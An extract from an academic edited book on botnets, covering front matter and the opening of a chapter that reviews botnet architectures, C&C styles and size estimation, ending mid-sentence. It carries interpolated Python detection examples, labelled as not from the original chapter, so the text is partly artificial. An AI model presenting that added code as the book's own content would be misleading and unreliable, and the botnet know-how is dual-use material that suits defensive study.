Botnets
Architectures, Countermeasures,
and Challenges
Edited by
Georgios Kambourakis
Marios Anagnostopoulos
Weizhi Meng
Peng Zhou
CRC Press
Taylor & Francis Group
6000 Broken Sound Parkway NW, Suite 300
Boca Raton, FL 33487-2742
© 2020 by Taylor & Francis Group, LLC
CRC Press is an imprint of Taylor & Francis Group, an Informa business
No claim to original U.S. Government works
Printed on acid-free paper
International Standard Book Number-13: 978-0-367-19154-2 (Hardback)
This book contains information obtained from authentic and highly regarded sources. Reasonable efforts
have been made to publish reliable data and information, but the author and publisher cannot assume
responsibility for the validity of all materials or the consequences of their use. The authors and publishers
have attempted to trace the copyright holders of all material reproduced in this publication and apologize
to copyright holders if permission to publish in this form has not been obtained. If any copyright material
has not been acknowledged please write and let us know so we may rectify in any future reprint.
Except as permitted under U.S. Copyright Law, no part of this book may be reprinted, reproduced,
transmitted, or utilized in any form by any electronic, mechanical, or other means, now known or hereafter
invented, including photocopying, microfilming, and recording, or in any information storage or retrieval
system, without written permission from the publishers.
For permission to photocopy or use material electronically from this work, please access www.copyright.com
(www.copyright.com/) or contact the Copyright Clearance Center, Inc. (CCC), 222 Rosewood Drive,
Danvers, MA 01923, 978-750-8400. CCC is a not-for-profit organization that provides licenses and
registration for a variety of users. For organizations that have been granted a photocopy license by the
CCC, a separate system of payment has been arranged.
Trademark Notice: Product or corporate names may be trademarks or registered trademarks, and are used
only for identification and explanation without intent to infringe.
Visit the Taylor & Francis Web site at
www.taylorandfrancis.com
and the CRC Press Web site at
www.crcpress.com
Contents
Preface.......................................................................................................... vii
About the Editors ...........................................................................................ix
Contributors...................................................................................................xi
1 Botnet Architectures: A State-of-the-Art Review.................................... 1
BASHEER AL-DUWAIR AND MOATH JARRAH
2 IoT Botnets: The Journey So Far and the Road Ahead........................ 33
PASCAL GEENENS
3 IoT Botnet Traits and Techniques: A View of the State of the Art .... 101
PASCAL GEENENS
4 Advanced Information Hiding Techniques for Modern Botnets ....... 165
LUCA CAVIGLIONE, WOJCIECH MAZURCZYK, AND STEFFEN
WENDZEL
5 Steganography Techniques for Command and Control
(C2) Channels.................................................................................... 189
JEDRZEJ BIENIASZ AND KRZYSZTOF SZCZYPIORSKI
6 Blockchain-Based Botnets for Command-and-Control Resilience .... 217
WEIZHI WANG AND XIAOBO MA
7 Detecting Botnets and Unknown Network Attacks in
Big Traffic Data ................................................................................. 237
LUIS SACRAMENTO, IBÉRIA MEDEIROS, JOÃO BOTA, AND MIGUEL
CORREIA
8 Domain Generation Algorithm Detection Techniques through
Network Analysis and Machine Learning .......................................... 269
FEDERICA BISIO, SALVATORE SAELI, AND DANILO MASSA
v
9 Identifying IoT-Based Botnets: A Microservice Architecture for
IoT Management and Security........................................................... 293
THARUN KAMMARA AND MELODY MOH
10 Understanding and Detecting Social Botnet.......................................327
YUEDE JI AND QIANG LI
11 Use of Botnets for Mining Cryptocurrencies......................................359
RENITA MURIMI
12 Time to Diverge the Botnet Revenues from Criminal Wallet?............387
GIOVANNI BOTTAZZI, GIANLUIGI ME, PIERLUIGI PERRONE, AND
GIUSEPPE GIULIO RUTIGLIANO
Index............................................................................................................403
Preface
Botnets pose a growing threat to the Internet, with their ever-increasing distributed
denial of service (DDoS) attacks of various kinds. In the Internet of Everything
(IoE) era, a botnet army can be assembled from a variety of enslaved machines,
including desktop computers, smartphones, wearables, and embedded devices.
These multitudinous armies are controlled remotely by a malicious third party,
known as the botmaster or botherder. Recent botnet examples, such as the case of
the Mirai botnet, prove that it is quite straightforward to discover and remotely
control thousands or millions of unmonitored and poorly protected devices. The
mushrooming of cheap Internet of Things (IoT) devices deployed with default
settings and poor protection, and far more numerous than conventional computers,
gives rise to even greater concern. This paves the way for assembling powerful botnets.
To stay off the radar and increase the resilience of their botnet, botmasters
employ covert command and control (C2) channels for keeping in touch with the
bots and disseminating their instructions. Nowadays, they even hide their C2
servers inside the vast cloud-computing infrastructure and exploit robust anonymity
networks such as Tor and I2P. To do so, a botmaster takes advantage of a
variety of architectures, namely centralized, decentralized, and hybrid, relies on
network protocols including HTTP, IRC, DNS, and P2P, and exploits techniques
such as fast-fluxing and domain generation algorithms (DGAs). On the other
hand, defenders' efforts focus on the timely detection and hijacking of the C2
channel to isolate the bots from their controller.
Besides launching DDoS attacks, botnets are used for spam campaigns, sensitive
data harvesting, distribution of malware, cryptocurrency mining, and defamation
campaigns, to name a few. In fact, a botnet is the perfect means to carry out
economically profitable, low-risk criminal activities. Typically, the botmaster leases
their infrastructure to potential customers for accomplishing their goals. So, even
for a naive attacker, it is easy to hire the services of a botnet for a specific period
in order to fulfil their nefarious desires, while the accumulated revenue for the
botmaster is huge. Perhaps the most popular service that actually sells access to
DDoS botnets is well known as DDoS-for-hire or, euphemistically, “Stresser.” Of
course, all these botnet services are created by cybercrime-as-a-service producers.
Even more, with the exploitation of the infected machines’ computing power for
cryptocurrency mining, the botmaster's profit can be significantly increased, while
the trace-back of the revenues is rendered impossible.
This book comprises a number of state-of-the-art contributions from both
scientists and practitioners working in the detection of botnets, and prevention
and mitigation of their aftermath. It aspires to provide a relevant reference for
students, researchers, engineers, and professionals working in this particular area
or those interested in grasping its diverse facets and exploring the latest advances
on the botnets’ issue. More specifically, the book consists of 12 contributions
classified into 4 pivotal subareas:
Botnet architectures: Introducing the state-of-the-art botnet architectures, the
most prominent IoT-based botnet cases, and the latest traits and techniques for
IoT-based botnets.
C2 channels: Offering the latest variants of advanced and sophisticated C2
channels based on information hiding techniques, steganography, and blockchain
technology.
Detection and mitigation of botnets: Dealing with the detection of commu-
nication of botnets in big data, the analysis of network traces for the detection of
algorithmically generated domains utilized for the coordination of botnets, the
identification of IoT-based botnets via microservice architectures, and the detec-
tion of social botnets.
Financial revenue from botnets: Exploring the exploitation of botnets for
mining cryptocurrencies, and the utilization of botnets as a profitable tool for
criminals.
About the Editors
Dr. Marios Anagnostopoulos received his Ph.D. degree in information and
communication systems engineering from the Department of Information and
Communication Systems Engineering, University of the Aegean, Greece, in 2016.
The title of his doctoral thesis was “DNS as a multipurpose attack vector.”
Currently, he is a Post-Doctoral Research Fellow at the Norwegian University of
Science and Technology (NTNU). Prior to joining NTNU, he worked as a Post-Doctoral
Research Fellow at the Singapore University of Technology and Design
(SUTD). His research interests are in the fields of network security and privacy,
mobile and wireless networks security, cyber-physical security, and blockchain in
security and privacy.
Dr. Georgios Kambourakis received the Ph.D. degree in information and
communication systems engineering from the Department of Information and
Communications Systems Engineering, University of the Aegean, Greece, where he
is currently an associate professor, and the head of the department. His research
interests are in the fields of mobile and wireless networks security and privacy. He
has over 120 refereed publications in the aforementioned fields of study. For more
information, please visit http://www.icsd.aegean.gr/gkamb.
Dr. Weizhi Meng is currently an assistant professor in the Cyber Security Section,
Department of Applied Mathematics and Computer Science, Technical University
of Denmark (DTU), Denmark. He received his Ph.D. degree in computer science
from the City University of Hong Kong (CityU), China. Prior to joining DTU, he
worked as a research scientist in Institute for Infocomm Research, A*Star, Singapore,
and as a senior research associate in CS Department, CityU. He won the Out-
standing Academic Performance Award during his doctoral study and is a recipient of
the Hong Kong Institution of Engineers (HKIE) Outstanding Paper Award for
Young Engineers/Researchers in both 2014 and 2017. He is also a recipient of Best
Paper Award from ISPEC 2018 and Best Student Paper Award from NSS 2016. His
primary research interests are cyber security and intelligent technology in security,
including intrusion detection, smartphone security, biometric authentication, HCI
security, trust management, blockchain in security, and malware analysis.
Dr. Peng Zhou is currently an associate professor at Shanghai University. He
received his Ph.D. degree from the Hong Kong Polytechnic University and
worked as a research fellow at Nanyang Technological University, Singapore, for
one year. His research interests include network security, computer worms and
propagation, and machine learning.
Contributors
Yuede Ji
George Washington University
Qiang Li
College of Computer Science and
Technology
Jilin University
Changchun, China
Miguel Correia
INESC-ID, Instituto Superior
Técnico
Universidade de Lisboa
Luís Sacramento
INESC-ID, Instituto Superior
Técnico
Universidade de Lisboa
Ibéria Medeiros
LASIGE, Faculdade
de Ciências
Universidade de Lisboa
João Bota
Vodafone Portugal
Melody Moh
Dept. of Computer Science
San Jose State University
San Jose, CA, USA
Tharun Kammara
Dept. of Computer Science
San Jose State University
San Jose, CA, USA
Luca Caviglione
Institute for Applied Mathematics
and Information Technologies
National Research Council of Italy
Italy
Wojciech Mazurczyk
Warsaw University of Technology
Poland
Steffen Wendzel
Worms University of Applied
Sciences
Germany
Federica Bisio
aizoOn, Strada del Lionetto
Torino, Italy
Danilo Massa
aizoOn, Strada del Lionetto
Torino, Italy
Giuseppe Giulio Rutigliano
University of Rome Tor Vergata
Italy
Giovanni Bottazzi
LUISS Guido Carli University
Italy
Gianluigi Me
LUISS Guido Carli University
Italy
Pierluigi Perrone
University of Rome Tor Vergata
Italy
Renita Murimi
Oklahoma Baptist University
USA
Basheer Al-Duwairi
Jordan University of Science and
Technology
Jordan
Moath Jarrah
Jordan University of Science and
Technology
Jordan
Pascal Geenens
Radware, Inc.
Xiaobo Ma
Ministry of Education Key Lab for
Intelligent Networks and
Network Security, School of
Electronic and Information
Engineering
Xi’an Jiaotong University
Weizhi WANG
Ministry of Education Key Lab for
Intelligent Networks and
Network Security
Xi’an Jiaotong University
Jedrzej Bieniasz
Institute of Telecommunications
Warsaw University of Technology
Poland
Krzysztof Szczypiorski
Institute of Telecommunications
Warsaw University of Technology
Poland
Chapter 1
Botnet Architectures
A State-of-the-Art Review
Basheer Al-Duwairi and Moath Jarrah
Faculty of Computer & Information Technology, Jordan University of Science &
Technology, Jordan
Contents
1.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2
1.2 Botnets main characteristics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3
1.2.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
1.2.2 Characterizing botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
1.2.2.1 The botnet size. . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.2.2.2 Geographical Distribution of Botnets. . . . . . . . . . . . . 8
1.2.2.3 Spatial-Temporal Correlation and Similarity . . . . . . . . 9
1.3 Centralized Botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .10
1.3.1 Case study: IRC-based botnets. . . . . . . . . . . . . . . . . . . . . . . .11
1.4 P2P Botnets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14
1.4.1 Case study: ZeroAccess P2P botnet . . . . . . . . . . . . . . . . . . . .16
1.5 Mobile Botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .18
1.5.1 Examples of mobile botnets. . . . . . . . . . . . . . . . . . . . . . . . . .21
1.5.1.1 SMS-based mobile botnets . . . . . . . . . . . . . . . . . . . .21
1.5.1.2 Cloud-based push-styled mobile botnets . . . . . . . . . . .21
1.6 IoT Botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .22
1.7 Social Botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24
1.7.1 Operation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24
1.8 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .25
1.1 Introduction
In recent years, cybercrimes associated with botnets have been considered
a major threat to the Internet and to technology. A botnet consists of a number of
infected hosts that receive commands from a botmaster [1]. The botnet is
basically formed by installing bots on vulnerable computers. Bots are software
programs that perform actions upon receiving commands from users or programs.
Bots usually stay in a passive state until they receive commands from the
botmaster (a hacker). Bots are designed to establish and utilize available
communication channels that enable them to receive commands, execute commands,
and periodically report data back to the botmaster. Reports include their status
and statistical information. Furthermore, bots are usually programmed to keep up
to date with the latest bot version. The botmaster maintains control over the
botnet through the command and control (C&C) communication channel, which
represents the core of the botnet.
Generally, bots try to exploit software vulnerabilities that allow malicious
programs to infect computing systems. Examples of such vulnerabilities are
buffer overflows, backdoor installations, software bugs, and unsecured memory
management mechanisms. Releasing bot code to the public results in the spread
of many variants of the bot within a short time [2–5]. Making the bot’s source
code available makes it easier for hackers to extend it and develop more
sophisticated code to serve their objectives. For example, Agobot is structured
in a modular design, which makes it attractive to botnet developers. According
to [2], there exist different types of bots and different variants of each type in
today’s digital computing world. Hackers are always interested in discovering new
software vulnerabilities and in improving their bots to a higher level of
sophistication. Hence, it is expected that more bots will evolve and pose serious threats.
This urges companies and researchers to develop efficient countermeasure
methods to stop the cybercrimes that are committed by botnets. Botnets represent a major
contributor to malicious traffic in today’s Internet [1].
Moreover, the botnet attack landscape has expanded tremendously in recent
years because of new, highly sophisticated versions of botnets. The development of
botnet architectures and types is driven by hackers’ interests, the expansion of the
Internet, and the development of Internet technology. Organized hacking groups,
organizations, and cyber criminals are increasingly threatening businesses, and
about one-third of the world's companies have experienced the threat of
cybercrime [6]. Botnets are being used extensively for malware distribution targeting
the banking sector [7]. Botnets provide hackers with a platform for personal profit
and financial gain through extortion, ransomware, and cryptocurrency.
Cyberattacks are also targeting critical Internet infrastructure and cyber-physical
systems, including smart grids, nuclear plants, and transportation systems. In
addition, botnets are expected to take a role in future cyber wars. With the
tremendous expansion of the Internet, botnets are no longer limited to infecting
only PCs and laptops. Several types of botnets have appeared in recent years, such
as smartphone, Internet of Things (IoT), and social botnets. The enormous
growth of botnets has enabled hackers to use them for different forms of malicious
activity, including distributed denial-of-service (DDoS) attacks, email spam,
click fraud, and identity theft. In this context, botnets can be viewed as an attack
infrastructure that is used to launch several types of cybercrimes. This chapter is
focused on the emerging and predominant threat of botnets. In Section 1.2, we
provide a detailed description of botnets and discuss their main characteristics.
Section 1.3 discusses centralized botnets. Section 1.4 explains peer-to-peer (P2P)
botnets. Section 1.5 presents mobile botnets. Section 1.6 provides a description
of IoT-based botnets. Social botnets are presented in Section 1.7. Finally, the
conclusion is presented in Section 1.8.
1.2 Botnets Main Characteristics
A botnet can be viewed as an attack infrastructure that consists of compromised
hosts connected together to form a network using a variety of application
layer protocols, such as IRC, HTTP, email, and P2P protocols. In this section,
we discuss the botnet life cycle, explain their malicious usage, discuss their main
characteristics, and illustrate different approaches that are used to obtain
insightful information about botnets.
1.2.1 Overview
A botnet’s lifetime consists of three main stages, as follows.
Stage 1—recruitment stage: The botnet formation starts by recruiting as many
vulnerable machines as possible to become part of a botnet. This is done by
infecting machines with the bot code using different mechanisms. One of the
mechanisms adopts traditional worm propagation techniques to spread botnet
malware [8,9]. This approach does not require any user intervention. An infected
machine has the ability to search for other vulnerable machines on the Internet
through active scanning for known vulnerabilities. There are also several
mechanisms to recruit vulnerable machines in a passive manner, where user
intervention is required. Social engineering is a powerful mechanism used
by botmasters to convince end users to download bot binaries [10,11]. This
is usually achieved by sending out massive phishing campaigns through email and
social networks (e.g., Twitter, Facebook), where a user is tricked into clicking on
a malicious link that results in the download of a bot binary [12,13]. In other
cases, the malware may spread as an email attachment or by tricking the user into
visiting websites that have active content such as JavaScript or ActiveX controls.
When a user visits a website that contains malicious active content, the malware
is installed automatically. It is also possible to spread botnet binaries through
physical media (e.g., USB flash drives), where the malware is usually in the form
of an executable and starts running as soon as the user double-clicks on it. Physical
media infection aims to compromise machines with private IP addresses that are
not directly reachable from the Internet (e.g., behind a NAT box).
Stage 2—C&C stage: The botmaster maintains control over the infected
machines (bots) through a C&C channel. The architecture of the botnet depends
on the implementation of the C&C channel. In centralized botnets, the botmaster
controls its botnet through a central server known as the C&C server. In P2P
botnets, there is no central server between the botmaster and the botnet machines.
Hence, the botmaster communicates directly with a small subset of botnet machines.
These machines in the subset serve as mailboxes between the botmaster and other
botnet machines. The machines are located using the inherent features of the P2P
protocol that is used to implement the botnet. More details of centralized and P2P
botnets are provided in Section 1.3 and Section 1.4. The communication style
between the botmaster and the bots can be a Push or a Pull style. In the Push style,
commands are sent directly to the bots. In the Pull style, bots (infected machines)
keep checking for new commands periodically [14]. The two communication styles
are illustrated in Figure 1.1.
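The Pull style described above leaves a timing fingerprint that defenders can use: a bot that polls for new commands periodically produces connections to the same destination with nearly constant inter-arrival times, whereas human-driven traffic is bursty. The following Python example is added here and is not code from the chapter; it scores connection records per (source, destination) pair by the coefficient of variation of their gaps. The flow records are constructed sample data, and the thresholds `min_events` and `max_cv` are illustrative assumptions rather than values from the chapter.

```python
"""Timing-based detector for pull-style C&C polling (added example, not from the chapter)."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample flow records: (epoch seconds, source IP, destination IP).
# The first host polls roughly every 60 s with small jitter (pull-style bot);
# the second host shows irregular, bursty browsing-like activity.
FLOWS = [
    (1000, "10.0.0.5", "203.0.113.10"), (1061, "10.0.0.5", "203.0.113.10"),
    (1119, "10.0.0.5", "203.0.113.10"), (1180, "10.0.0.5", "203.0.113.10"),
    (1240, "10.0.0.5", "203.0.113.10"), (1302, "10.0.0.5", "203.0.113.10"),
    (1359, "10.0.0.5", "203.0.113.10"), (1420, "10.0.0.5", "203.0.113.10"),
    (1005, "10.0.0.7", "198.51.100.20"), (1009, "10.0.0.7", "198.51.100.20"),
    (1150, "10.0.0.7", "198.51.100.20"), (1152, "10.0.0.7", "198.51.100.20"),
    (1400, "10.0.0.7", "198.51.100.20"), (1401, "10.0.0.7", "198.51.100.20"),
    (1404, "10.0.0.7", "198.51.100.20"), (1900, "10.0.0.7", "198.51.100.20"),
]


def interarrival_stats(flows):
    """Per (src, dst) pair: event count, mean gap and coefficient of variation of gaps."""
    by_pair = defaultdict(list)
    for ts, src, dst in flows:
        by_pair[(src, dst)].append(ts)
    stats = {}
    for pair, times in by_pair.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(gaps) < 2:  # too few observations to judge regularity
            continue
        mu = mean(gaps)
        cv = pstdev(gaps) / mu if mu > 0 else float("inf")
        stats[pair] = {"count": len(times), "mean_gap": mu, "cv": cv}
    return stats


def find_beacons(flows, min_events=6, max_cv=0.1):
    """Pairs whose gaps are both numerous and nearly constant (low CV).

    Thresholds are illustrative assumptions; a real deployment tunes them
    against the local baseline and allows for jitter added by the bot.
    """
    return {pair: s for pair, s in interarrival_stats(flows).items()
            if s["count"] >= min_events and s["cv"] <= max_cv}


if __name__ == "__main__":
    for pair, s in find_beacons(FLOWS).items():
        print(f"{pair[0]} -> {pair[1]}: {s['count']} events, "
              f"mean gap {s['mean_gap']:.1f}s, cv {s['cv']:.3f}")
```

The polling host is flagged because its seven gaps average 60 s with a coefficient of variation near 0.03, while the browsing host, with the same number of events, has a CV above 1 and is ignored. The same scoring applies to any pair key (for example adding destination port), which is how the idea generalizes beyond the two-host sample.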
Stage 3—botnet activity stage: The botnet activity represents the set of actions and
attacks (e.g., DDoS, scanning, etc.) that are performed by bots in response to
commands issued by the botmaster [15–17]. A compromised host’s
bandwidth is important information that indicates the host’s capability in
launching attacks, especially DDoS. Hence, bots estimate the host’s bandwidth by
sending data to many servers. Figure 1.2 shows an example of an IRC-based botnet
[Figure 1.1: two panels. (a) Push style: the botmaster sends “Commands” to the botnet. (b) Pull style: the botnet asks the botmaster “Any command?”]
Figure 1.1 Botnet communication styles: (a) Push style (b) Pull style.
activity in response to a set of commands that were issued by the botmaster. The
figure shows the interaction between a botmaster (nickname seed) and one of the
bots (nickname vofm) in an IRC chat channel (#nes554). This is a typical example of
a push style communication where the botmaster issues certain commands that are
sent to the bot directly. For example, the command
.open notepad
instructs the bot to run notepad.exe. Running the Notepad application is just an
example that shows the capabilities of this botnet. Botmasters instruct bots to run
malware binaries after downloading them from a given server. Another example
involves instructing the bot to perform a DNS query for a given host name and
return the result to the botmaster.
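The Figure 1.2 scenario, a botmaster nick issuing dot-prefixed commands to bots in an IRC channel, is also a content-based detection opportunity for anyone monitoring IRC traffic on their network. The Python example below is added here and is not code from the chapter: it parses raw IRC lines, keeps channel messages whose text starts with the command prefix shown in the figure, and counts which nicks issue them. The nicknames "seed" and "vofm" and the channel "#nes554" come from the chapter's description; the host parts, the second command, the replies and the unrelated chatter are constructed, and the assumption that commands start with "." mirrors the figure rather than any universal convention.

```python
"""Flag IRC channel messages that look like botmaster commands (added example, not from the chapter)."""
from collections import Counter

# Constructed raw IRC lines modelled on the Figure 1.2 scenario. Only the nicks
# seed/vofm and channel #nes554 are from the chapter; everything else is invented.
SAMPLE_LINES = [
    ":seed!seed@10.0.0.1 PRIVMSG #nes554 :.open notepad",
    ":vofm!vofm@10.0.0.5 PRIVMSG #nes554 :ok",
    ":seed!seed@10.0.0.1 PRIVMSG #nes554 :.dns example.com",
    ":vofm!vofm@10.0.0.5 PRIVMSG #nes554 :resolved",
    ":alice!alice@10.0.0.9 PRIVMSG #chat :hello everyone",
    "PING :irc.example.net",
]

# Assumption: command prefix as in the chapter's ".open notepad" example.
COMMAND_PREFIX = "."


def parse_irc_line(line):
    """Split one raw IRC line into sender nick, command, middle params and trailing text."""
    line = line.rstrip("\r\n")
    nick = None
    if line.startswith(":"):                       # optional ":prefix " before the command
        prefix, _, line = line[1:].partition(" ")
        nick = prefix.split("!", 1)[0]             # "nick!user@host" -> "nick"
    if " :" in line:                               # trailing parameter may contain spaces
        head, _, trailing = line.partition(" :")
    else:
        head, trailing = line, None
    parts = head.split()
    if not parts:
        return None
    return {"nick": nick, "command": parts[0].upper(), "params": parts[1:], "text": trailing}


def find_bot_commands(lines):
    """Channel messages whose text starts with the command prefix."""
    hits = []
    for line in lines:
        msg = parse_irc_line(line)
        if not msg or msg["command"] != "PRIVMSG" or not msg["text"] or not msg["params"]:
            continue
        target = msg["params"][0]
        if target.startswith("#") and msg["text"].startswith(COMMAND_PREFIX):
            hits.append({"nick": msg["nick"], "channel": target, "text": msg["text"]})
    return hits


def command_issuers(lines):
    """How many prefixed commands each nick sent; a single dominant issuer is the push-style pattern."""
    return Counter(hit["nick"] for hit in find_bot_commands(lines))


if __name__ == "__main__":
    for hit in find_bot_commands(SAMPLE_LINES):
        print(f"{hit['channel']} <{hit['nick']}> {hit['text']}")
    print(command_issuers(SAMPLE_LINES))
```

On the sample, both commands are attributed to "seed" and the normal chat in #chat is ignored. A single nick issuing many prefixed commands to a channel in which the other members only acknowledge is the push-style signature the chapter describes; the parser itself follows the generic ":prefix COMMAND params :trailing" line shape, so it works on any captured IRC session, not only the constructed one.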
Understanding botnets and their operational aspects requires us to investigate
different bots to reveal their malicious intents [2]. For example, P. Barford et al.
studied the source codebases of four major botnets: Agobot, SDBot, SpyBot, and
GT Bot [18]. Analyzing a bot's source code or running a botnet malware instance in
a sandbox is an efficient method to identify botnet features and capabilities, including
the C&C mechanisms. In general, botnets are considered major sources of
different types of attacks and malicious activities on the Internet. These include the
following:
Figure 1.2 Example of an IRC-based botnet activity.
■ DDoS attacks: Botnets are used to launch several forms/types of DDoS attacks,
such as application layer attacks (e.g., HTTP-based attacks), SYN flooding, and
DNS amplification attacks. Bots are instructed to overwhelm the target system
with a high volume of traffic rate (e.g., HTTP requests, SYN packets, and DNS
requests).
■ Email spam campaigns: This refers to sending a large amount of spam
email, which results in traffic that decreases the signal-to-noise measure
[19]. Email spammers usually use botnets for massive email spam campaigns
to advertise pharmaceutical products and adult content, and to distribute
malware. An email spam template is distributed along with a list of email
recipients to the workers (bots). The bots are then instructed to send spam with
the contents that are specified in advance by the spammer.
■ Identity theft: Botmasters have the ability to collect sensitive information
(such as email accounts, banking accounts, and credit card numbers) from
the bot machines.
■ Cryptocurrency: The computing power of the machines that belong to a
botnet can be utilized by botmasters to perform cryptocurrency mining to
obtain bitcoins in an illegal way.
■ Click fraud: Whereby a botmaster generates bogus clicks on online
advertisements (usually utilizing a field of the HTTP request header) that
mimic legitimate request patterns, which results in large sums of money
being paid by the advertisers [20]. Online advertisement is becoming very
popular, and the pricing model for this type of advertisement is usually
based on a pay-per-click approach, meaning that the revenue for the
advertisement platform (e.g., Facebook, Google) depends on the number of clicks
that are made through the platform. Unfortunately, several
hackers exploit this model and use botnets to perform fraudulent clicks.
Based on the above discussion, botnets have two main planes of operation:
(i) the C&C plane, where bots continuously wait for commands from
the botmaster, and (ii) the activity plane, which involves the execution of the
received commands to launch different attacks such as DDoS, cryptocurrency
mining, spam campaigns, and click fraud. The C&C topology determines the method of
command delivery. In centralized botnets, the botmaster communicates with the
bots through a central server, while in P2P botnets, the botmaster communicates
with the bots through a subset of bots (mailboxes).
1.2.2 Characterizing Botnets
There have been considerable research efforts to characterize botnets and understand
their operations (e.g., [1,15,18,21–23]). These studies focused on estimating botnet
sizes, geographical distributions, and their spatial and temporal characteristics. Such
characterization was accomplished through after-the-fact analysis of traffic
traces and packet logs to gain insight into the nature of this threat. The
community is also interested in identifying botnet formation techniques. Based on these
research studies, the main characteristics of botnets are described below.
1.2.2.1 The Botnet Size
The size of a botnet is an important factor in the intensity and spread of
cyberattacks. The importance of this metric and its role in measuring
botnet effectiveness has been discussed in [24]. While large botnets are viewed as
a serious threat to Internet services, small botnets are also a threat, especially for
attacks that do not require a large amount of traffic, such as ransomware and identity
theft. Small botnets can be easily managed, rented, and kept undetected. Determining
a botnet’s actual size is an important issue because it leads to a better understanding
of the threat. In this context, the botnet size has been a point of debate because it is
unclear what the term “botnet size” exactly means.
The ambiguity in specifying a botnet size is due to several issues that complicate
the task of computing the number of compromised machines in a botnet. The join-
leave actions of bots result from (i) turning infected machines ON and OFF by their
users, (ii) temporary bot migration, in which botmasters ask bots to leave one botnet
and join a different botnet, and (iii) cloning, where bots make replicas of themselves
and connect to different channels or servers [1]. Most researchers agree that a clear
definition for a botnet size must be used. Here we adopt the definition that is used in
[24] which states: Botnet size is defined as the largest connected portion of the botnet
[24,25]. This does not represent the count of all infected machines within a botnet. It
mainly represents the count of online bots (the machines that are currently active).
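The definition above separates three counts that are easily confused: every host that carries the bot, the hosts that are online at a given moment, and the largest portion of those online hosts that are connected to one another. The Python example below, added here and not code from the chapter, computes all three over a constructed P2P peer-list snapshot with hypothetical bot identifiers. It also shows why a crawl started from one bot (the crawling technique discussed later in this section) only measures that bot's own connected portion. The assumption that knowing a peer counts as a symmetric link is mine, not the chapter's.

```python
"""Botnet size as the largest connected portion of online bots (added example, not from the chapter)."""
from collections import deque

# Constructed snapshot: each infected host and the peers it knows about.
# Bot identifiers are hypothetical; this is not data from any real botnet.
PEER_LISTS = {
    "bot-A": ["bot-B", "bot-C", "bot-X"],
    "bot-B": ["bot-A", "bot-D"],
    "bot-C": ["bot-A"],
    "bot-D": ["bot-B"],
    "bot-E": ["bot-F"],
    "bot-F": ["bot-E", "bot-Y"],
    "bot-G": ["bot-H"],
    "bot-H": ["bot-G"],
    "bot-X": ["bot-A"],  # infected but powered off at snapshot time
    "bot-Y": ["bot-F"],  # infected but powered off at snapshot time
}
# Hosts that were reachable when the snapshot was taken.
ONLINE = {"bot-A", "bot-B", "bot-C", "bot-D", "bot-E", "bot-F", "bot-G", "bot-H"}


def crawl(seed, peer_lists, online):
    """Breadth-first crawl from one online bot, following its peer lists.

    Offline peers are skipped because a real crawler cannot contact them, so
    the result is only the portion reachable from the seed, not the whole botnet.
    """
    if seed not in online:
        return set()
    seen, queue = {seed}, deque([seed])
    while queue:
        current = queue.popleft()
        for peer in peer_lists.get(current, []):
            if peer in online and peer not in seen:
                seen.add(peer)
                queue.append(peer)
    return seen


def undirected_adjacency(peer_lists, online):
    """Assumption: knowing a peer is treated as a symmetric link between online hosts."""
    adj = {bot: set() for bot in online}
    for bot, peers in peer_lists.items():
        for peer in peers:
            if bot in online and peer in online:
                adj[bot].add(peer)
                adj[peer].add(bot)
    return adj


def connected_components(peer_lists, online):
    """All connected portions of the online botnet, largest first."""
    adj = undirected_adjacency(peer_lists, online)
    comps, remaining = [], set(online)
    while remaining:
        comp = crawl(next(iter(remaining)), adj, online)
        comps.append(comp)
        remaining -= comp
    return sorted(comps, key=len, reverse=True)


def botnet_size(peer_lists, online):
    """Botnet size per the definition adopted in the text: largest connected online portion."""
    comps = connected_components(peer_lists, online)
    return len(comps[0]) if comps else 0


def summary(peer_lists, online):
    """The three counts that 'botnet size' is often confused with."""
    return {
        "infected": len(peer_lists),                # every host carrying the bot
        "online": len(online),                      # hosts currently active
        "size": botnet_size(peer_lists, online),    # largest connected online portion
    }


if __name__ == "__main__":
    print(summary(PEER_LISTS, ONLINE))
    print("reachable from bot-A:", sorted(crawl("bot-A", PEER_LISTS, ONLINE)))
```

On the sample, ten hosts are infected, eight are online, and the size under the adopted definition is four, because the two offline hosts split the online bots into portions of four, two and two. A crawl seeded at bot-E would report only two bots, which is the under-counting risk a single-seed crawl carries when the botnet is fragmented.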
There are several techniques for determining the size of a botnet. These mainly
depend on the botnet architecture and on the ability to infiltrate or take over the
botnet. The following techniques are typically used to estimate a botnet's size [25]:
■ Botnet infiltration: The main idea of this technique is to join the C&C channel of
a botnet (e.g., to connect to the IRC server of a botnet) and then record the number
of bots that are connected to the channel simultaneously. This can be achieved by
implementing an IRC tracker (similar to the one presented in [1]) that mimics the
operation of an actual bot.
■ DNS redirection: This method redirects connections made to the botnet's C&C
server to another server (e.g., a sinkhole) by manipulating the DNS entry associated
with the server [26]. By completing the three-way TCP handshake with connecting
bots, the sinkhole can identify these bots and record their IP addresses. This
technique has the limitation of counting only the bots that attempt to connect to
the C&C server during the measurement period. Also, where the botmaster uses
multiple channels on the same C&C server, it is not possible to identify the bots
that belong to a particular channel. Finally, Zou et al. [27] explain that botmasters
can easily detect this technique and redirect the bots to a different IRC server.
■ DNS cache snooping: This method collects information from thousands of Domain
Name System (DNS) servers. It searches the caches of these servers for entries of
a botnet's C&C server. Abu Rajab et al. used this method successfully to estimate
botnet sizes [1]. In most cases, bots need to resolve the IP address of the C&C
server by querying a DNS server. Therefore, the size of the botnet can be estimated
by probing a large collection of DNS servers and recording the cache hits. The list
